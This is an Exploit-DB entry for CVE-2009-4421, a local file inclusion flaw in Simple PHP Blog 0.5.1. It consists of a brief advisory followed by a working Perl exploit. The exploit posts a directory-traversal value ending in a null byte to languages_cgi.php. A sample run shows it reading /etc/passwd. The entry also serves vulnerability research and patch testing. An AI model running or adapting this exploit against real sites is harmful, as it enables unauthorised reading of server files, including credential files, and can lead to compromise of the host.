Simple PHP Blog 0.5.1 - Local File Inclusion

Author: jgaliana
type: webapps
platform: php
port: 
date_added: 2009-12-21 
date_updated:  
verified: 0 
codes: CVE-2009-4421;OSVDB-61334 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsphpblog_0511.zip

# Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly
# sanitize user-supplied input.

#An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scripts in the context of the webserver process. This may allow the #attacker to compromise the application and the underlying computer; other attacks are also #possible.

# Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana <at> isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");
my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " .$res->status_line, "\n";
}

#$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1
#root:*:0:0:root:/root:/bin/bash